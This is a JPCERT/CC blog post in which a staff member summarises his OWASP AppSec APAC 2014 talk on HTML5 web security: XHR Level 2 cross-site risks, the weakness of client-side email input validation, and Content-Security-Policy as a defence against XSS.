Presenting HTML5 security at OWASP AppSec APAC 2014

Hi. This is Yoshinori Matsumoto from Watch and Warning Group.


After JPCERT/CC’s publication of a technical research report on HTML5 last October, our group has been working intensively to raise awareness on security issues of web applications utilizing HTML5. We have been given opportunities to speak at various security conferences on this topic, and one of them was my colleague’s presentation at "CODE BLUE" introduced on this blog earlier. This time, I would like to share some of the technical highlights of my presentation on this topic delivered at “OWASP AppSec APAC 2014


OWASP and OWASP Global AppSec

If you are a security-minded web developer, I am sure you have heard about Open Web Application Security Project (OWASP). OWASP Global AppSec is an international software security conference which deals with web application security. It is organized and held by the OWASP Foundation 4 times a year in various regions, and this time it was held in Japan for the first time from March 17 to 20. You can tell from the number of participants that the locals were very excited about this event - around 400 including developers, researchers, information governance officers, business managers, etc. joined the event.


My Presentation

Under the title “HTML5 Security for Web Application Development”, I referred to the presence of the security issues of web applications using HTML5, along with some demonstrations on functions/elements which inherent risks XMLHttpRequest (XHR) Level2 and HTML5 new input type form and also on the injection attack mitigation measure (Content-Security-Policy HTTP header).


The first demonstration was on XMLHttpRequest (XHR) Level2, an extended functionality of the XHR object. While XHR Level1 supports only same-origin requests, XHR Level2 supports both same-origin and cross-site requests. I showed a case study by using a client browser that supports XHR Level 2. When this client browser is requested to connect in a cross-site manner, there is a possibility that the user may be redirected to a malicious website. Since the URLs which the browser can access is not specified in JavaScript, it allows the so-called Cross-Site Scripting (XSS) attack. I also showed another case study on a user of a file uploader which is vulnerable to Cross-Site Request Forgery (CSRF). Even if the website is not using HTML5, this security issue will take place with the web browsers which supports XHR Level2.


The next demonstration was on <input type="email">, a new input type form in HTML5. This is intended to allow better input control and validation, which restricts the input strings entered from the user only to the email address format. However, this input type can be easily altered by editing the source HTML or sending a request directly to the website. In fact, I showed how this can be simply done by editing the source HTML with a web development tool, namely, Firebug. Thus, this input type is not recommended as a security measure.


The last demonstration was on Content-Security-Policy HTTP header, which mitigates content injection vulnerabilities such as XSS attacks. By implementing this header, it allows website owners to create a white-list of trusted contents and instructs the web browsers to only execute or render resources from those contents. I demonstrated how this can be taken as a safety net for client-side by sending a JavaScript for cross-site request, which successfully ended up preventing the execution.


A photo of me speaking at OWASP AppSec (taken by koyhoge)


For more information about my presentation, please refer to the slides here.


Research report (in English) on HTML5 security to be published

HTML 5 has given us the opportunity to create richer and interactive websites. However, utilization of HTML5 without understanding its inherent risks may cause unintended results. Therefore, we need to carefully understand about HTML5 security issues upon using them. JPCERT/CC’s research report on this matter intends to provide basic references for web security researchers and developers. It is only in Japanese now, but the English version will be coming up in the end of May. We will let you know via this blog, so stay tuned!


Thank you!

- Yoshinori Matsumoto